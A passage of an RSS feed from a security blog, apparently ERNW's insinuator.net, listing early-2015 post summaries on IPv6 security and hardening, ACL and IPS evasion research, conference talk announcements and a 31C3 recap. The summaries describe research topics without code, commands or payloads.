      <description>&lt;p&gt;Server operating systems with an OS, for which vendor support has ended, come with many risks that have to be considered and addressed. The primary goal should be always to decommission or migrate the majority of end-of-life (EoL) servers to OS versions, supported by the vendor. Here it should be noted that a migration to an up-to-date OS should be preferably done before your organization enters the end of life of that software 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers TelcoSecDay – Next Talks (II)</title>
      <link>https://insinuator.net/2015/02/troopers-telcosecday-next-talks-ii/</link>
      <pubDate>Thu, 12 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/troopers-telcosecday-next-talks-ii/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;in addition to those &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-15-telcosecday-first-talks/&#34;&gt;recently announced&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-telcosecday-next-talks/&#34;&gt;these&lt;/a&gt;, we’ve identified three more suitable talks for the TelcoSecDay &lt;img src=&#34;http://www.insinuator.net/wp-includes/images/smilies/icon_wink.gif&#34; alt=&#34;;-)&#34;&gt;.&lt;/p&gt;&#xA;&lt;p&gt;These are:&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Hendrik Schmidt: Security Aspects of VoLTE&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: VoLTE is on its rise in mobile telecommunications. The service is provided by the IP Multimedia Subsystem (IMS) which consists of a couple of components. All those components offer new and, from an attacker’s perspective, interesting interfaces. This talk evaluates the most interesting interfaces and demonstrates attack vectors an attacker could abuse. This covers attacks from customer access, Internet VoIP services and roaming exchange.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers TelcoSecDay – Next Talks</title>
      <link>https://insinuator.net/2015/02/troopers-telcosecday-next-talks/</link>
      <pubDate>Tue, 10 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/troopers-telcosecday-next-talks/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;in addition to those &lt;a href=&#34;http://www.insinuator.net/2015/02/troopers-15-telcosecday-first-talks/&#34;&gt;recently announced&lt;/a&gt; we’ve identified two more suitable talks for the TelcoSecDay 😉&lt;br&gt;&#xA;These are&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Ravishankar Borgaonkar – TelcoSecurity Mirage: 1G to 5G&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: The evolution of the mobile networking technology from 1G to 5G is driving the needs of our modern Digital Society. In this talk, we visit the security pillars of these technologies and discuss if 5G can strengthen them or not from an end-users perspective. In particular, we try to fill up security requirements for 5G networks based on the ongoing design direction.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6-related Requirements for Security Devices</title>
      <link>https://insinuator.net/2015/02/ipv6-related-requirements-for-security-devices/</link>
      <pubDate>Sun, 08 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/ipv6-related-requirements-for-security-devices/</guid>
      <description>&lt;p&gt;This is the sequel to the similar post on “&lt;a href=&#34;http://www.insinuator.net/2015/01/ipv6-related-requirements-for-the-internet-uplink-or-mpls-networks/&#34;&gt;IPv6-related Requirements for the Internet Uplink or MPLS Networks&lt;/a&gt;“. As mentioned there these requirements were created in the course of an RfP for network security services. The goal of this document was to provide a check list of IPv6-related requirements that security devices being part of the individual providers’ offerings have to fulfill in order to fully support the future IPv6 network. &lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 15 TelcoSecDay – First Talks</title>
      <link>https://insinuator.net/2015/02/troopers-15-telcosecday-first-talks/</link>
      <pubDate>Sat, 07 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/troopers-15-telcosecday-first-talks/</guid>
      <description>&lt;p&gt;At &lt;a href=&#34;https://www.troopers.de/troopers/&#34;&gt;Troopers15&lt;/a&gt; there will be another TelcoSecDay, like in the years before (&lt;a href=&#34;https://www.troopers.de/events/troopers14/395_telcosec_day_2014_invitation_only/&#34;&gt;2014&lt;/a&gt;, &lt;a href=&#34;https://www.troopers.de/events/troopers13/406_telcosec_day_2013_invitation_only/&#34;&gt;2013&lt;/a&gt;, &lt;a href=&#34;https://www.troopers.de/events/troopers12/427_telcosec_day/&#34;&gt;2012&lt;/a&gt;). Here’s the first three talks (of overall 5-6):&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Luca Bruno: Through the Looking-Glass, and What Eve Found There&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: Traditionally, network operators have provided some kind of public read-only access to their current view of the BGP routing table, by the means of a “looking glass”.&lt;br&gt;&#xA;In this talk we inspect looking glass instances from a security point of view, showing many shortcomings and flaws which could let a malicious entity take control of critical devices connected to them. In particular, we will highlight how easy it is for a low-skilled attacker to gain access to core routers within multiple ISP infrastructures.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Hardening Guide for OS X</title>
      <link>https://insinuator.net/2015/02/ipv6-hardening-guide-for-os-x/</link>
      <pubDate>Wed, 04 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/ipv6-hardening-guide-for-os-x/</guid>
      <description>&lt;p&gt;Similar to the documents we released &lt;a href=&#34;http://www.insinuator.net/2014/12/ipv6-hardening-guide-for-linux-servers/&#34;&gt;for Linux&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2014/12/ipv6-hardening-guide-for-windows-servers/&#34;&gt;Windows&lt;/a&gt; (and actually inspired by a comment to the post on the Linux guide) &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios&lt;/a&gt; wrote another guide, this time for Mac OS X.&lt;/p&gt;&#xA;&lt;p&gt;It can &lt;a href=&#34;https://www.ernw.de/download/ERNW_Hardening_IPv6_MacOS-X_v1_0.pdf&#34;&gt;be found here&lt;/a&gt;. We hope some of you might find it helpful.&lt;br&gt;&#xA;Have a great day&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;&#xA;&lt;p&gt;PS: in the past we also made a &lt;a href=&#34;https://www.ernw.de/download/hardening/ERNW_Checklist_OSX_Hardening.pdf&#34;&gt;general Mac OS X hardening document available&lt;/a&gt; and we’ve discussed an additional patch &lt;a href=&#34;http://www.insinuator.net/2013/07/basic-os-x-hardening-dma/&#34;&gt;in this post&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Is RFC 6939 Support Finally Here – Checking the Implementation of the “Client Link Layer Address Option” in DHCPv6</title>
      <link>https://insinuator.net/2015/02/is-rfc-6939-support-finally-here-checking-the-implementation-of-the-client-link-layer-address-option-in-dhcpv6/</link>
      <pubDate>Wed, 04 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/is-rfc-6939-support-finally-here-checking-the-implementation-of-the-client-link-layer-address-option-in-dhcpv6/</guid>
      <description>&lt;p&gt;One of the main DHCPv6 enhancements – fyi: we have already discussed DHCPv6 &lt;a href=&#34;http://www.insinuator.net/tag/dhcpv6/&#34;&gt;in some other posts&lt;/a&gt; – many practitioners have been waiting for quite some time now, is full support of &lt;a href=&#34;https://tools.ietf.org/rfc/rfc6939.txt&#34;&gt;RFC 6939&lt;/a&gt; (Client Link-Layer Address Option in DHCPv6) by network devices (acting as relays) and DHCPv6 servers. RFC 6939 support would allow a number of things which large organizations use in their DHCPv4 based networks, incl.&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;reservations (assigning a kind-of fixed DHCP address based on the MAC address of a system which in turn allows for “centralized administration of somewhat static addresses”).&lt;/li&gt;&#xA;&lt;li&gt;correlation of IPv4 and IPv6 addresses of a given host identified by its MAC address.&lt;/li&gt;&#xA;&lt;li&gt;(some type) of security enforcement based on the MAC address of a host gathered in the course of a DHCP exchange (see for example slide #29 of &lt;a href=&#34;https://ripe68.ripe.net/presentations/294-cern-ipv6-deployment.pdf&#34;&gt;this presentation of the IPv6 deployment at CERN&lt;/a&gt;, btw: slide #9 might be helpful when discussing IPv6 transition plans with your CIO. or not).&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;So far it seemed very few components support RFC 6939. When &lt;a href=&#34;https://twitter.com/bckcntryskr&#34;&gt;Tim Martin&lt;/a&gt; mentioned at Cisco Live that Cisco devices running IOS XE support it by default, we decided go to the lab ;-).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Using Android without Google, Part 1</title>
      <link>https://insinuator.net/2015/02/using-android-without-google-part-1/</link>
      <pubDate>Tue, 03 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/02/using-android-without-google-part-1/</guid>
      <description>&lt;p&gt;We’re using our smart phones every day to manage contacts, calendar entries, e-mail, and social communication (please note that we at ERNW still have a strict “no company data on smartphones/tablets” – which includes email). Everything is easy to use and automated syncing provides access to our data from anywhere. Data is stored in most cases on premises of a cloud service provided by the OS vendor of your smart phone – mostly Google, Apple or Microsoft. You don’t need to pay for this service – and the cloud provider could use your data for personalization and service improvements.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6-related Requirements for the Internet Uplink or MPLS Networks</title>
      <link>https://insinuator.net/2015/01/ipv6-related-requirements-for-the-internet-uplink-or-mpls-networks/</link>
      <pubDate>Sat, 31 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/ipv6-related-requirements-for-the-internet-uplink-or-mpls-networks/</guid>
      <description>&lt;p&gt;We’re currently involved in a complex RfP procedure for global network services of a large organization. As part of that we were asked to define a list of IPv6 related requirements as for the  Internet uplink and MPLS circuit connections. The involved service providers/carrier offerings will be checked to comply with those.&lt;/p&gt;&#xA;&lt;p&gt;As a source of inspiration we mainly used the excellent “&lt;a href=&#34;http://docwiki.cisco.com/wiki/What_To_Ask_From_Your_Service_Provider_About_IPv6&#34;&gt;What To Ask From Your Service Provider About IPv6&lt;/a&gt;” document from Cisco, and enhanced that with stuff we observed in other environments (go wrong), namely with regard to MTU/PMTUD  and in the &lt;a href=&#34;https://ripe69.ripe.net/presentations/137-RIPE69_Langner_Rey_Schaetzle_Slash48_Considered_Harmful.pdf&#34;&gt;space of prefix filtering&lt;/a&gt;. Here’s the first draft list we came up with:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Evaluation of IPv6 Capabilities of Commercial IPAM Solutions</title>
      <link>https://insinuator.net/2015/01/evaluation-of-ipv6-capabilities-of-commercial-ipam-solutions/</link>
      <pubDate>Wed, 28 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/evaluation-of-ipv6-capabilities-of-commercial-ipam-solutions/</guid>
      <description>&lt;p&gt;Originating from a customer IPv6 deployment project, in early 2014 we defined a number of requirements as for the IPv6 capabilities of IPAM solutions, with a certain focus on security-related requirements (due to the specific environment of the project). We subsequently performed a practical evaluation of several commercial solutions, based on documentation, lab implementation and vendor communication.&lt;/p&gt;&#xA;&lt;p&gt;We just released &lt;a href=&#34;https://www.ernw.de/download/newsletter/ERNW_Newsletter_46_Evaluation_of_Commercial_IPAM_Solutions_IPv6_Capabilities.pdf&#34;&gt;a newsletter describing the requirements and the results of the evaluation&lt;/a&gt;.&lt;br&gt;&#xA;It should be noted that in the interim newer versions of the evaluated products might be available which might have enhanced features. Hence, from our perspective, understanding the requirements of an individual environment might even be more important than the actual results described in that document (as those only reflect a certain point of time). We hope to contribute here to a well-informed requirements definition and decision taking process on your side.&lt;br&gt;&#xA;Feel free to get back to us on any of the points laid out or, even better, join us at the Troopers &lt;a href=&#34;https://www.troopers.de/events/troopers15/322_ipv6_security_summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt; in Heidelberg on Mar 16th/17th in order to discuss any related points.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Evasion of Cisco ACLs by (Ab)Using IPv6 &amp; Discussion of Mitigation Techniques</title>
      <link>https://insinuator.net/2015/01/evasion-of-cisco-acls-by-abusing-ipv6-discussion-of-mitigation-techniques/</link>
      <pubDate>Wed, 28 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/evasion-of-cisco-acls-by-abusing-ipv6-discussion-of-mitigation-techniques/</guid>
      <description>&lt;p&gt;This is a guest post of &lt;a href=&#34;https://twitter.com/antoniosatlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;During our blogpost regarding &lt;a href=&#34;http://www.insinuator.net/2015/01/dhcpv6-guard-do-it-like-ra-guard-evasion/&#34;&gt;&lt;em&gt;DHCPv6 Guard evasion&lt;/em&gt;&lt;/a&gt;, one of the side-effects was that Access Control Lists (ACLs) configured to block access to UDP ports 546 can be evaded by abusing (again) IPv6 Extension headers. Having that in mind, we decided to check the effectiveness of Cisco IPv6 ACLs under various scenarios. Our goal was to examine whether the IPv6 ACLs of Cisco routers can be evaded, as well as under which conditions this can take place. To this end, several representative scenarios from enterprise environments or other potential ones are examined.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Persistent Problem of State in IPv6 (Security)</title>
      <link>https://insinuator.net/2015/01/the-persistent-problem-of-state-in-ipv6-security/</link>
      <pubDate>Wed, 28 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/the-persistent-problem-of-state-in-ipv6-security/</guid>
      <description>&lt;p&gt;I’ve discussed the heavy complexity of IPv6 and its negative impact on security architectures relying on state  – you know, “stateful” firewalls and the like 😉 – before (&lt;a href=&#34;https://www.ernw.de/download/ERNW_Security_Implications_of_Disruptive_Technologies_web.pdf&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;https://www.troopers.de/media/filer_public/42/1a/421a0a30-0a35-486a-b25e-7eea27f18ef7/troopers14-why_ipv6_security_is_so_hard-structural_deficits_of_ipv6_and_their_implications-enno_rey.pdf&#34;&gt;here&lt;/a&gt;. btw, the widely discussed IPv6-related &lt;a href=&#34;http://blog.bimajority.org/2014/09/05/the-network-nightmare-that-ate-my-week/&#34;&gt;network outage&lt;/a&gt; at MIT last year was a state problem as well: switches keeping track of multicast groups, of which in turn many existed due privacy extensions combined with the &lt;a href=&#34;http://www.insinuator.net/2014/09/mld-and-neighbor-discovery-are-they-related/&#34;&gt;unfortunate relationship of MLD and ND&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;One of the conclusions I’ve drawn in the past was recommending to minimize the amount of state one might use within security architectures in the IPv6 world. First, this is bad news for quite some well-established security controls that need a certain amount of state to work properly, like IDPS systems – which subsequently &lt;a href=&#34;https://www.ernw.de/download/Atlasis_Rey_Schaefer_BHEU_2014_Evasion_of_HighEnd_IPS_Devices.pdf&#34;&gt;have hard times to work properly&lt;/a&gt; in IPv6 networks.&lt;br&gt;&#xA;Secondly there’s another severe caveat. As I fully realized yesterday, at Cisco Live Europe, in &lt;a href=&#34;https://twitter.com/ayourtch&#34;&gt;Andrew Yourtchenko&lt;/a&gt;‘s excellent breakout session on “Advanced IPv6 Security in the Core”, this carries some consequences for stateless (and hence: seemingly “unaffected”) security controls, too.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Observations from the Cisco Live Europe Wifi Infrastructure</title>
      <link>https://insinuator.net/2015/01/observations-from-the-cisco-live-europe-wifi-infrastructure/</link>
      <pubDate>Tue, 27 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/observations-from-the-cisco-live-europe-wifi-infrastructure/</guid>
      <description>&lt;p&gt;Given that Enno and I are network geeks, and that I am responsible for setting up the &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt; Wifi network I was curious which components might be used at Cisco Live and which IPv6 related configuration was done for the Wifi network to ensure a reliable network and reduce the chatty nature of IPv6. Andrew Yourtchenko (&lt;a href=&#34;https://twitter.com/ayourtch&#34;&gt;@ayourtch&lt;/a&gt;) already did an amazing job last year at Cisco Live Europe explaining in detail (at the time session &lt;a href=&#34;http://d2zmdbbm9feqrf.cloudfront.net/2014/eur/pdf/BRKEWN-2666.pdf&#34;&gt;BRKEWN-2666&lt;/a&gt;) the intricacies of IPv6 in Wifi networks, and how to optimize IPv6 for these networks. He was also a great inspiration for me when setting up the &lt;a href=&#34;https://www.troopers.de/media/filer_public/22/9d/229d97ec-f2de-4dac-a533-6651a493f231/troopers14-case_study-building_a_secure_ipv6_guest_wifi_network-christopher_werny.pdf&#34;&gt;Troopers Wifi network&lt;/a&gt; a couple of weeks later. Thank You!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Evaluating Behavior-based Malware Detection</title>
      <link>https://insinuator.net/2015/01/evaluating-behavior-based-malware-detection/</link>
      <pubDate>Fri, 23 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/evaluating-behavior-based-malware-detection/</guid>
      <description>&lt;p&gt;Quite some organizations complemented their traditional AV solutions with a technology that can best be described as behavior-based malware detection. While we all know we are talking about products like Fireeye Email/Network Security, zScaler Web Security/APT Protection, or Cisco WSA, there are a lot of terms around to describe this type of products (such as next generation malware analysis/detection, Secure Web Gateways, or behavior-based malware detection). Those offerings typically promise the detection of malware by analyzing the behavior of ‘samples’ (which are files captured in transit of different types, such as executables or PDF documents). However, beyond the taxonomy challenges, both assessment and consulting work gets us frequently in contact with those solutions. While the main task during assessments is to bypass those solutions, the main question in the consulting context typically is “to what degree are the solutions suited to protect from common targeted attacks in the enterprise context”. Luckily, the experience from assessment work allows us to tackle this question in a structured way (which is our approach for consulting anyways: Benefit from our assessment experiences in order to provide reasonable consulting advice…).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Riding the Z-Wave, Part 1</title>
      <link>https://insinuator.net/2015/01/riding-the-z-wave-part-1/</link>
      <pubDate>Tue, 20 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/riding-the-z-wave-part-1/</guid>
      <description>&lt;p&gt;Simple everyday work dialog:&lt;br&gt;&#xA;“The heater in the basement is still missing a proper thermostat, the ‘binary solution’ isn’t that effective”&lt;br&gt;&#xA;–  “Buy one…”&lt;br&gt;&#xA;–  “Ok”&lt;br&gt;&#xA;–  “Get one you can break…”&lt;br&gt;&#xA;– “Ok, but then I’d like a few tools, too”&lt;br&gt;&#xA;– “Go for it.”&lt;br&gt;&#xA;(That’s the way work should be!)&lt;br&gt;&#xA;Result of the dialog: a &lt;a href=&#34;http://radiatorthermostats.danfoss.com/products/living-by-Danfoss/living-connect/%20&#34;&gt;Danfoss Living Connect Z ( 014G0013 )&lt;/a&gt; and a &lt;a href=&#34;http://www.ti.com/tool/cc1110dk-mini-868&#34;&gt;TI CC1100 Wireless Mini Dev Kit&lt;/a&gt; plus a copy of &lt;a href=&#34;https://code.google.com/p/z-force/&#34;&gt;Z-Force&lt;/a&gt; to start with.&lt;br&gt;&#xA;&lt;em&gt;Goal: Talk to the thermostat!&lt;/em&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers15 IPv6 Security Summit</title>
      <link>https://insinuator.net/2015/01/troopers15-ipv6-security-summit/</link>
      <pubDate>Tue, 20 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/troopers15-ipv6-security-summit/</guid>
      <description>&lt;p&gt;We’ve finalized the agenda for this year’s IPv6 Security Summit. Here’s an overview of the event:&lt;/p&gt;&#xA;&lt;p&gt;The “IPv6 Security Summit” is a special two-day convention in the context of the &lt;a href=&#34;https://www.troopers.de/troopers/&#34;&gt;Troopers security conference&lt;/a&gt;. It will be run in two tracks of both half-day workshops and 90 minute presentations on specific topics. The goal is to foster the discussion of IPv6 security aspects &amp;amp; issues and to provide practical advice for security officers, network planners and practitioners in the IPv6 security field.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Main IPv6 Related Mailing Lists</title>
      <link>https://insinuator.net/2015/01/main-ipv6-related-mailing-lists/</link>
      <pubDate>Sat, 17 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/main-ipv6-related-mailing-lists/</guid>
      <description>&lt;p&gt;We’re sometimes approached with the question “Which IPv6 mailing lists do you guys read/subscribe to?” – here’s a quick overview of the main ones guys like Christopher, Patrick, Rafael, Antonios and myself are periodically lurking at, to discuss IPv6 (network|security) related stuff with other practitioners and to learn from them:&lt;/p&gt;&#xA;&lt;p&gt;ipv6-ops.&lt;br&gt;&#xA;This list is a forum for people who are actually deploying IPv6 in the Internet. Its focus is on OPERATIONAL issues.&lt;br&gt;&#xA;&lt;a href=&#34;http://lists.cluenet.de/mailman/listinfo/ipv6-ops/&#34;&gt;http://lists.cluenet.de/mailman/listinfo/ipv6-ops/&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>(In-)secure SD cards on WP8.1</title>
      <link>https://insinuator.net/2015/01/in-secure-sd-cards-on-wp8.1/</link>
      <pubDate>Thu, 15 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/in-secure-sd-cards-on-wp8.1/</guid>
      <description>&lt;p&gt;During our first year of testing Windows Phone 8 applications we had yet another, let’s say: “surprising” finding. It all started with the first approaches on pentesting mobile applications on that  new and rather closed platform. Lacking jailbreak, root, and similar approaches we had a closer look at alternate approaches to have a look at an apps interior. We quickly hooked onto using modified firmwares (with deeper system access) and found a perfect solution in a little flaw concerning the handling of SD cards in WP8.1. A flaw that was, sadly for us, fixed silently….&lt;/p&gt;</description>
    </item>
    <item>
      <title>Skeleton Key – a Nasty Piece of Malware. Some Remarks.</title>
      <link>https://insinuator.net/2015/01/skeleton-key-a-nasty-piece-of-malware.-some-remarks./</link>
      <pubDate>Thu, 15 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/skeleton-key-a-nasty-piece-of-malware.-some-remarks./</guid>
      <description>&lt;p&gt;Just recently, Dell SecureWorks Counter Threat Unit(TM) (CTU) researchers published details (see &lt;a href=&#34;http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/&#34;&gt;http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/&lt;/a&gt; ) on a especially nasty piece of malware that bypasses authentication on Active Directory (AD) systems which implement single-factor (password only) authentication. Once deployed the malware stays quite noiseless in the Domain Controller´s (DC) RAM, and the DC´s replication issues caused by it weren´t interpreted – in this case – during months as a hint for system compromise. Probably the malware´s modification on the LSASS process reduced the DC´s ability to perform DC-to-DC authentication, but this is only speculation and not where we would like to go today.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How To Configure Snort to Stop IPv6 Evasion Attacks</title>
      <link>https://insinuator.net/2015/01/how-to-configure-snort-to-stop-ipv6-evasion-attacks/</link>
      <pubDate>Sun, 11 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/how-to-configure-snort-to-stop-ipv6-evasion-attacks/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Hi all,&lt;/p&gt;&#xA;&lt;p&gt;during our BlackHat US 2014 talk titled “&lt;a href=&#34;https://www.ernw.de/download/Atlasis_Rey_BHUSA_2014_IPv6_Evasion_of_HighEnd_IPS_Devices_web.pdf&#34;&gt;&lt;em&gt;Evasion of High-End IPS Devices in the Age of IPv6&lt;/em&gt;&lt;/a&gt;”, among others we discussed a Snort preprocessor rule (116:456) which, when enabled (not the case by default), triggers an alert when an IPv6 datagram with nine (9) or more IPv6 Extension Headers is used (such a header was used by us to evade Snort). However, we mentioned that:&lt;/p&gt;</description>
    </item>
    <item>
      <title>31C3 Recap</title>
      <link>https://insinuator.net/2015/01/31c3-recap/</link>
      <pubDate>Sat, 10 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/31c3-recap/</guid>
      <description>&lt;p&gt;As every year some of us used the holidays to visit the Chaos Communication Congress to socialize with like-minded people and to hear interesting talks.&lt;br&gt;&#xA;I mean what other reasons than learning about security might exist to leave behind all your lovely in-laws you’ve been sharing some relative’s house with the days before … 😉&lt;br&gt;&#xA;Here is a short recap of some of the talks we found most interesting:&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Mining for Bugs with Graph Database Queries&lt;/strong&gt; by &lt;strong&gt;Fabian Yamaguchi&lt;/strong&gt;&lt;br&gt;&#xA;&lt;a href=&#34;http://media.ccc.de/browse/congress/2014/31c3_-_6534_-_en_-_saal_g_-_201412282030_-_mining_for_bugs_with_graph_database_queries_-_fabs.html#video&#34;&gt;Video&lt;/a&gt;&lt;br&gt;&#xA;One of my favorite talks at this years congress was about the open source tool &lt;a href=&#34;http://mlsec.org/joern/&#34;&gt;joern&lt;/a&gt;, a code analysis platform for C/C++ applications. Fabian, the main author of joern, presented his work on vulnerability discovery in large code bases. One of the key points of his work is robustness, meaning that the resulting tools should produce meaningful results in large and noisy real world projects even if this results in a loss of accuracy. The second important point is that tools should assist human auditors, not replace them, which seems to be one of the more interesting current research directions (see also &lt;a href=&#34;https://static.squarespace.com/static/507c09ede4b0954f51d59c75/t/528965cbe4b037c7a156b3f1/1384736203503/think_cyborg_not_robot.pdf&#34;&gt;this paper&lt;/a&gt;). At its core joern combines standard compiler technology with modern graph databases to offer auditors a powerful way to search for certain code constructs. To do this joern parses source code into an AST (Abstract Syntax Tree) and creates the corresponding CFG (Control Flow Graph), as well as a Data Dependency Graph (PDG) for all functions. This creates the Code Property Graph which combines all three representation forms into a single unified layer.&lt;br&gt;&#xA;The Code Property Graph is stored inside a graph database (joern uses &lt;a href=&#34;http://neo4j.com/&#34;&gt;neo4j&lt;/a&gt;), which can be queried using a powerful graph traversal language named &lt;a href=&#34;https://github.com/tinkerpop/gremlin/wiki&#34;&gt;gremlin&lt;/a&gt; (&lt;a href=&#34;https://github.com/tinkerpop/gremlin/wiki)&#34;&gt;https://github.com/tinkerpop/gremlin/wiki)&lt;/a&gt;. The combination of gremlin with some wrapper tools included in joern gives an auditor the possibility to construct powerful search queries against the code base. Fabian presented different queries he used to search for vulnerabilities in the VLC video player, as well as the Linux kernel that resulted in really impressive results (and a high number of discovered vulnerabilities). Joern is definitely a tool you should check out and I’m looking forward to more impressive research by its author.&lt;br&gt;&#xA;– Felix&lt;/p&gt;</description>
    </item>
    <item>
      <title>DHCPv6 Guard: Do It Like RA Guard Evasion</title>
      <link>https://insinuator.net/2015/01/dhcpv6-guard-do-it-like-ra-guard-evasion/</link>
      <pubDate>Thu, 08 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/dhcpv6-guard-do-it-like-ra-guard-evasion/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Or: When Cisco ACL Can Count Up to Five 🙂&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;This is a guest post by &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Hi all,&lt;/p&gt;&#xA;&lt;p&gt;RA Guard Evasion is well-known in the IPv6 “circles”; there is &lt;a href=&#34;https://tools.ietf.org/rfc/rfc7113.txt&#34;&gt;RFC 7113&lt;/a&gt; Advice for IPv6 Router Advertisement Guard (RA-Guard) and many interesting blog-posts like this one &lt;a href=&#34;http://www.insinuator.net/2011/03/ipv6-security-part-2-ra-guard-%E2%80%93-lets-get-practical/&#34;&gt;here&lt;/a&gt;, &lt;a href=&#34;http://www.insinuator.net/2012/03/the-story-continues-another-ipv6-update/&#34;&gt;here&lt;/a&gt;, and this excellent write-up &lt;a href=&#34;http://6lab.cz/article/rogue-router-advertisement-attack/&#34;&gt;here&lt;/a&gt; that discuss this issue.&lt;br&gt;&#xA;Moreover, as Jim Smalls states in his comprehensive “&lt;a href=&#34;http://www.rmv6tf.org/wp-content/uploads/2013/04/5-IPv6-Attacks-and-Countermeasures-v1.2.pdf&#34;&gt;IPv6 Attacks and Countermeasures&lt;/a&gt;” presentation given at the &lt;a href=&#34;http://www.rmv6tf.org/na-ipv6-summit/2013-na-ipv6-summit/2013-presentations&#34;&gt;North American IPv6 Summit 2013&lt;/a&gt;, DHCPv6 Guard or a corresponding IPv6 ACL can stop a DHCPv6 Rogue Servers, but (only?) for non-malicious/non-fragmented DHCPv6 packets (slide 35). However, at that time there wasn’t any known attack tool in the wild that had the fragmentation evasion built in.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Should IPv6 Packets With Source Address ::1 Be Processed When Received on an External Interface?</title>
      <link>https://insinuator.net/2015/01/should-ipv6-packets-with-source-address-1-be-processed-when-received-on-an-external-interface/</link>
      <pubDate>Mon, 05 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/should-ipv6-packets-with-source-address-1-be-processed-when-received-on-an-external-interface/</guid>
